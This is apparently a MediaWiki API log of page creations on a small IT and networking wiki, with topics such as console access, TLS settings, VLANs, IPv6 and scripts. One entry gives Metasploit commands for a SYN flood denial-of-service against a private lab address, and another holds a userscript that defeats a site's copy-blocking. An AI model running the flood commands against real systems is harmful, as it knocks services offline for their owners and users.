MediaWiki API result
This is the HTML representation of the JSON format. HTML is good for debugging, but is unsuitable for application use.
Specify the format parameter to change the output format. To see the non-HTML representation of the JSON format, set format=json.
See the complete documentation, or the API help for more information.
{
"batchcomplete": "",
"continue": {
"lecontinue": "20251002181342|62",
"continue": "-||"
},
"query": {
"logevents": [
{
"logid": 72,
"ns": 0,
"title": "Console Port Access",
"pageid": 69,
"logpage": 69,
"revid": 1138,
"params": {},
"type": "create",
"action": "create",
"user": "50.220.241.211",
"anon": "",
"timestamp": "2026-02-25T18:06:52Z",
"comment": "Created page with \"This is the command you would use on linux to access a cisco device's console port. This would usually be through a RS232 to USB adapter. screen /dev/ttyUSB0 9600 Even though the console port on a cisco switch might be RJ45 like ethernet, its just RS232 serial with a different connector, hence why you need the adapter. On Windows you would probably want to use something like PuTTY.\""
},
{
"logid": 71,
"ns": 0,
"title": "TLS Setting in Internet Options",
"pageid": 68,
"logpage": 68,
"revid": 1131,
"params": {},
"type": "create",
"action": "create",
"user": "170.55.73.212",
"anon": "",
"timestamp": "2026-02-24T01:45:00Z",
"comment": "Created page with \"= TLS Settings in Internet Options (Windows) \u2013 Application Impact Chart = This page explains which applications are affected by the TLS protocol checkboxes located in: Control Panel \u2192 Internet Options \u2192 Advanced \u2192 Security These settings control the Windows SChannel / WinINet TLS stack. ---- == Applications Affected by Internet Options TLS Settings == These applications rely on Windows SChannel or WinINet and are directly affected by enabling or disabling T...\""
},
{
"logid": 70,
"ns": 0,
"title": "WAP Arrangement",
"pageid": 67,
"logpage": 67,
"revid": 1068,
"params": {},
"type": "create",
"action": "create",
"user": "209.87.206.13",
"anon": "",
"timestamp": "2026-02-04T02:32:03Z",
"comment": "Created page with \"= Wi-Fi Access Point Placement for 2.4\u202fGHz and 5\u202fGHz = This page provides guidelines for placing Wi-Fi access points (APs) to optimize coverage and performance for both 2.4\u202fGHz and 5\u202fGHz bands. == Overview == Wi-Fi networks commonly operate on two frequency bands: 2.4\u202fGHz and 5\u202fGHz. Each band has different characteristics: {| class=\"wikitable\" ! Feature !! 2.4\u202fGHz !! 5\u202fGHz |- | Range || Long, penetrates walls better || Short, limited range |- | Speed |...\""
},
{
"logid": 69,
"ns": 0,
"title": "Performing a SYN flood attack",
"pageid": 66,
"logpage": 66,
"revid": 1046,
"params": {},
"type": "create",
"action": "create",
"user": "50.220.241.211",
"anon": "",
"timestamp": "2026-02-02T21:59:07Z",
"comment": "Created page with \"From Kali Linux: Open msf-console: use auxiliary/dos/tcp/synflood show options set INTERFACE virbr0 set RHOST 192.168.122.7 exploit\""
},
{
"logid": 68,
"ns": 0,
"title": "802.1q",
"pageid": 65,
"logpage": 65,
"revid": 1015,
"params": {},
"type": "create",
"action": "create",
"user": "209.87.206.13",
"anon": "",
"timestamp": "2026-01-09T01:39:09Z",
"comment": "Created page with \"= IEEE 802.1Q = '''IEEE 802.1Q''' is a networking standard that defines '''Virtual LAN (VLAN) tagging''' on Ethernet networks. It allows multiple VLANs to be carried over a single physical link, a process known as '''VLAN trunking'''. == Overview == 802.1Q works by inserting a 4-byte tag into an Ethernet frame. This tag identifies the VLAN to which the frame belongs, enabling network switches to separate traffic logically while sharing the same physical infrastructure....\""
},
{
"logid": 67,
"ns": 0,
"title": "VM Userscript to disable website right-click and copy-blocking",
"pageid": 64,
"logpage": 64,
"revid": 989,
"params": {},
"type": "create",
"action": "create",
"user": "50.220.241.211",
"anon": "",
"timestamp": "2025-11-17T20:39:18Z",
"comment": "Created page with \" // ==UserScript== // @name Force Enable Right Click, Copy & Paste // @namespace http://tampermonkey.net/ // @version 3.0 // @description Re-enables right click, text selection, and copying/pasting on all sites // @author You // @match https://www.netacad.com/* // @grant none // @run-at document-start // ==/UserScript== (function() { 'use strict'; // Re-enable text selection and right-click const style...\""
},
{
"logid": 66,
"ns": 0,
"title": "Ipv6",
"pageid": 63,
"logpage": 63,
"revid": 941,
"params": {},
"type": "create",
"action": "create",
"user": "170.55.73.212",
"anon": "",
"timestamp": "2025-10-28T22:44:29Z",
"comment": "Created page with \"Preferred Format The previous figure also shows that the preferred format for writing an IPv6 address is x:x:x:x:x:x:x:x, with each \u201cx\u201d consisting of four hexadecimal values. The term octet refers to the eight bits of an IPv4 address. In IPv6, a hextet is the unofficial term used to refer to a segment of 16 bits, or four hexadecimal values. Each \u201cx\u201d is a single hextet which is 16 bits or four hexadecimal digits. Preferred format means that you write IPv6 addres...\""
},
{
"logid": 65,
"ns": 0,
"title": "Docker-Compose",
"pageid": 62,
"logpage": 62,
"revid": 939,
"params": {},
"type": "create",
"action": "create",
"user": "50.220.241.211",
"anon": "",
"timestamp": "2025-10-28T22:10:04Z",
"comment": "Created page with \"<hr> Use a local dockerfile instead of one hosted in a repo </hr> services: my_service: build: context: . dockerfile: Dockerfile\""
},
{
"logid": 64,
"ns": 0,
"title": "Example User onboarding & offboarding Scripts",
"pageid": 61,
"logpage": 37,
"revid": 913,
"params": {
"target_ns": 0,
"target_title": "Example User onboarding & offboarding Scripts for 365"
},
"type": "move",
"action": "move",
"user": "Lucka",
"timestamp": "2025-10-06T00:49:15Z",
"comment": ""
},
{
"logid": 63,
"ns": 0,
"title": "Perform actions based on notification content",
"pageid": 60,
"logpage": 60,
"revid": 908,
"params": {},
"type": "create",
"action": "create",
"user": "Lucka",
"timestamp": "2025-10-06T00:00:24Z",
"comment": "Created page with \" #!/usr/bin/env bash n1='buff luigi' n2='ripped mario' dbus-monitor \"interface=org.freedesktop.Notifications\" | grep -i -e \"$n1\" -e \"$n2\" --line-buffered | while read found_line; do echo \"$found_line\" mpv \"${HOME}/share/audio/dark_souls_2_parry.mp3\" # replace with your command done\""
}
]
}
}